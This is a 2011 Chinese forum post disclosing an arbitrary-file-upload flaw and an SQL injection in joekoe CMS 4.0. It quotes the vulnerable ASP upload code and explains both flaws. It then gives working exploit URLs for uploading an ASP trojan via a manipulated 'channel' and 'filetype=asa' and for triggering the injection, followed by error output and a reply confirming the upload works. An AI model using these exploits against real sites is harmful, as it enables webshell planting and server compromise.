oma 发表于 2011-12-20 09:47

joekoe CMS 4.0 两个漏洞

<P>乔客(joekoe) CMS 4.0 的2个高危漏洞<BR>&nbsp;&nbsp;&nbsp;&nbsp; 前段时间读了读乔客,发现在乔客4.0版本中存在两个高危漏洞,一个上传漏</P>
<P>洞,可以随意上传任意文件,包括ASP,另一个是SQL注入,甚至还有返回错误信息,可</P>
<P>怕啊</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp; 上传漏洞:<BR>看/common/include/web.upload.asp 中的代码</P>
<P>----------------------------------------------------------------------</P>
<P>-------------------------------------------------------------</P>
<P>sub doPageLoad()<BR>if APP_STATUS="close" then<BR>&nbsp;&nbsp; treeData.addItem "_status","error.message"<BR>&nbsp;&nbsp; treeData.addItem "_message","网站暂时因关闭维护中!请稍候..."<BR>&nbsp;&nbsp; exit sub<BR>end if<BR>up.doInit()<BR>if not upConfig.isInit then<BR>&nbsp;&nbsp; treeData.addItem "_status","error.message"<BR>&nbsp;&nbsp; treeData.addItem "_message","上传文件的参数不正确!"<BR>else<BR>&nbsp;&nbsp; doPageLoadUser()<BR>&nbsp;&nbsp; select case upConfig.channel<BR>&nbsp;&nbsp; case "forum"<BR>&nbsp;&nbsp;&nbsp; upConfig.setSaveDir(upConfig.getSaveDir&amp;(left</P>
<P>(ops.time.toConvertString("",10),6)&amp;DIR_SEPARATOR))<BR>&nbsp;&nbsp;&nbsp; upConfig.filename=""<BR>&nbsp;&nbsp; case "user.face"<BR>&nbsp;&nbsp;&nbsp; upConfig.filename="face_"&amp;upConfig.userid<BR>&nbsp;&nbsp;&nbsp; upConfig.setSaveDir("face"&amp;DIR_SEPARATOR)<BR>&nbsp;&nbsp;&nbsp; upConfig.filetype="gif"<BR>&nbsp;&nbsp; case "blog.logo"<BR>&nbsp;&nbsp;&nbsp; upConfig.setSaveDir("blog"&amp;DIR_SEPARATOR)<BR>&nbsp;&nbsp;&nbsp; upConfig.filetype="gif"<BR>&nbsp;&nbsp; case else<BR>&nbsp;&nbsp;&nbsp; if instr(upConfig.channel,".")&gt;0 then<BR>&nbsp;&nbsp;&nbsp;&nbsp; upConfig.setSaveDir(mid(upConfig.channel,1,instr</P>
<P>(upConfig.channel,".")-1)&amp;DIR_SEPARATOR)<BR>&nbsp;&nbsp;&nbsp; end if<BR>&nbsp;&nbsp;&nbsp; if instr(upConfig.fileinput,"url")&gt;0 then<BR>&nbsp;&nbsp;&nbsp;&nbsp; upConfig.filetype="affix"<BR>&nbsp;&nbsp;&nbsp; end if<BR>&nbsp;&nbsp; end select<BR>&nbsp;&nbsp; if len(upConfig.getSaveDir())&lt;3 then<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_status","error.message"<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_message","上传文件的参数不正确!"<BR>&nbsp;&nbsp;&nbsp; exit sub<BR>&nbsp;&nbsp; end if<BR>&nbsp; <BR>&nbsp;&nbsp; if 1=1 then<BR>&nbsp;&nbsp;&nbsp; upConfig.setData "zoom.channel.width",120<BR>&nbsp;&nbsp;&nbsp; upConfig.setData "zoom.channel.height",90<BR>&nbsp;&nbsp; end if<BR>&nbsp; <BR>&nbsp;&nbsp; upConfig.setBaseDir(DIR_ROOT&amp;DIR_UPLOAD)<BR>&nbsp;&nbsp; upConfig.setBasePath(opsDirPath(DIR_ROOT&amp;DIR_UPLOAD))<BR>&nbsp;&nbsp; upConfig.setBaseURL(URL_UPLOAD)<BR>&nbsp;&nbsp; up.doLoad()<BR>end if<BR>end sub</P>
<P>----------------------------------------------------------------------</P>
<P>-------------------------------------------------------------</P>
<P>这段代码通过channel判断是否给上传类型赋值,如果channel不等于forum、</P>
<P>user.face、blog.logo的时候判断fileinput是否包含url,如果不包含,</P>
<P>upConfig.filetype就不赋值,继续往下看<BR>----------------------------------------------------------------------</P>
<P>--<BR>&nbsp;&nbsp; if up.isPost() then<BR>&nbsp;&nbsp;&nbsp; call doParseUploadData()<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_status","succeed"<BR>&nbsp;&nbsp;&nbsp; dim tmpFormMode,tmpFileValue,tmpThumbValue<BR>&nbsp;&nbsp;&nbsp; tmpFormMode="set"<BR>&nbsp;&nbsp;&nbsp; if upConfig.channel="user.face" then<BR>&nbsp;&nbsp;&nbsp;&nbsp; tmpLinkMode="no"<BR>&nbsp;&nbsp;&nbsp;&nbsp; tmpFileValue="#"&amp;up.getFileInfo("filename")<BR>&nbsp;&nbsp;&nbsp; else<BR>&nbsp;&nbsp;&nbsp;&nbsp; tmpFileValue=up.getFileInfo("file.path")<BR>&nbsp;&nbsp;&nbsp;&nbsp; select case upConfig.filetype<BR>&nbsp;&nbsp;&nbsp;&nbsp; case "file"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpLinkMode="no"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'tmpFileValue=up.getFileInfo("file.path")<BR>&nbsp;&nbsp;&nbsp;&nbsp; case "pic","spic","pics","affix","gif","jpg","jpeg","bmp","png"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpLinkMode="no"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpThumbValue=up.getFileInfo("thumb.path")<BR>&nbsp;&nbsp;&nbsp;&nbsp; case else<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpLinkMode="again"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpFormMode="append"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dim tmpFileType:tmpFileType=lcase(up.getFileInfo("filetype"))<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; select case tmpFileType<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; case "gif","jpg","jpeg","bmp","png"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpFileValue=""<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; case "swf"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpFileValue=""<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; case else<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpFileValue="upload_download.asp?</P>
<P>id="&amp;upConfig.fileid&amp;""<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; end select<BR>&nbsp;&nbsp;&nbsp;&nbsp; end select<BR>&nbsp;&nbsp;&nbsp; end if<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_form.mode",tmpFormMode<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_form.filevalue",tmpFileValue<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_form.thumbvalue",tmpThumbValue<BR>&nbsp;&nbsp; end if<BR>----------------------------------------------------------------------</P>
<P>------------------------------<BR>这段代码判断upConfig.filetype,然后定义上传文件的后缀名,只要之前</P>
<P>upConfig.filetype没被赋值,且不是gif,jpg,jpeg,bmp,png,swf,就</P>
<P>tmpFileValue="upload_download.asp?</P>
<P>id="&amp;upConfig.fileid&amp;"",看到这个,大家眼睛都放光了,根据用</P>
<P>户的定义来判断上传类型,就好比问一个要偷东西的人:“你是贼么?”,这段</P>
<P>代码也太XX了,估计之前也有不少人读出来了,只不过没公开而已</P>
<P><BR>&nbsp;&nbsp;&nbsp;&nbsp; SQL注入漏洞<BR>还是在web.upload.asp中:<BR>----------------------------------------------------------------------</P>
<P>----------------------------------<BR>...........<BR>sub doParseUploadData()<BR>dim tmpFilePath,tmpFileType,tmpFileSize,tmpName<BR>tmpFilePath=up.getFileInfo("file.path")<BR>tmpFileType=up.getFileInfo("filetype")<BR>tmpFileSize=opsCommon.toInt(up.getFileInfo("filesize"))<BR>tmpName=up.getFileInfo("name")<BR>dim tmpChannel,tmpDataid,tmpType,tmpSQL,tmpID<BR>tmpChannel=upConfig.channel<BR>tmpDataid=0<BR>tmpType=0<BR>select case upConfig.channel<BR>case "user.face"<BR>&nbsp;&nbsp; tmpDataid=upConfig.userid<BR>&nbsp;&nbsp; tmpChannel="face"<BR>&nbsp;&nbsp; tmpType=1<BR>&nbsp;&nbsp; tmpSQL="select top 1 u_id from db_sys_upload where</P>
<P>nsort='"&amp;tmpChannel&amp;"' and iid="&amp;tmpDataid&amp;""<BR>case "blog.logo"<BR>&nbsp;&nbsp; tmpDataid=toInt(ops.client.getSession("user.blogid"))<BR>&nbsp;&nbsp; if tmpDataid&lt;1 then tmpDataid=upConfig.userid<BR>&nbsp;&nbsp; tmpChannel="blog"<BR>&nbsp;&nbsp; tmptype=1<BR>&nbsp;&nbsp; tmpSQL="select top 1 u_id from db_sys_upload where</P>
<P>nsort='"&amp;tmpChannel&amp;"' and iid="&amp;tmpDataid&amp;""<BR>case else<BR>&nbsp;&nbsp; tmpSQL="select top 1 u_id from db_sys_upload where</P>
<P>u_url='"&amp;tmpFilePath&amp;"'"<BR>end select<BR>..........<BR>----------------------------------------------------------------------</P>
<P>---------------------------------------<BR>看这句tmpSQL="select top 1 u_id from db_sys_upload where</P>
<P>u_url='"&amp;tmpFilePath&amp;"'",u_url来自&amp;tmpFilePath&amp;,而&amp;tmpFilePath&amp;来自</P>
<P>up.getFileInfo("file.path"),呵呵,没有经过任何过滤就放到SQL查询语句里</P>
<P>面查询了。</P>
<P>&nbsp;</P>
<P>利用方法:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1 .上传漏洞:很好利用,把channel变量改一下,只要不等于forum、</P>
<P>user.face、blog.logo就行,然后filetype改成asa,就可以光明正大的上传木马</P>
<P>了,具体url可以这样common/upload.asp?</P>
<P>channel=use&amp;filetype=asa&amp;filename=&amp;fileinput=u_face&amp;formname=&amp;thumbname</P>
<P>=&amp;thumbinput=,然后上传</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2. SQL注入漏洞:在Channel变量中加入诸如语句,比如:</P>
<P>common/upload.asp?</P>
<P>channel=use'&amp;filetype=gif&amp;filename=&amp;fileinput=u_face&amp;formname=&amp;thumbnam</P>
<P>e=&amp;thumbinput=,然后上传,就会报错<BR>----------------------------------------------------------------------</P>
<P>------------------------------------------------------------</P>
<P>Joekoe CMS 4.0<BR>错误信息:<BR>select top 1 u_id from db_sys_upload where</P>
<P>u_url='user'/20070722031234c.gif'<BR>原始错误:<BR>Error #-2147217900, 第 1 行: 'c' 附近有语法错误。 Microsoft OLE DB</P>
<P>Provider for SQL Server<BR>返回首页<BR>Processed in 0.188 s, 1 queries, 54 Cache.</P>
<P>*-------------------------</P>
<P>自己试过。。上传没什么问题。。</P>
<P>后面的SQL。。好像已经没什么用了!!自己试吧</P>
<DIV></DIV>
页: [1]
查看完整版本: joekoe CMS 4.0 两个漏洞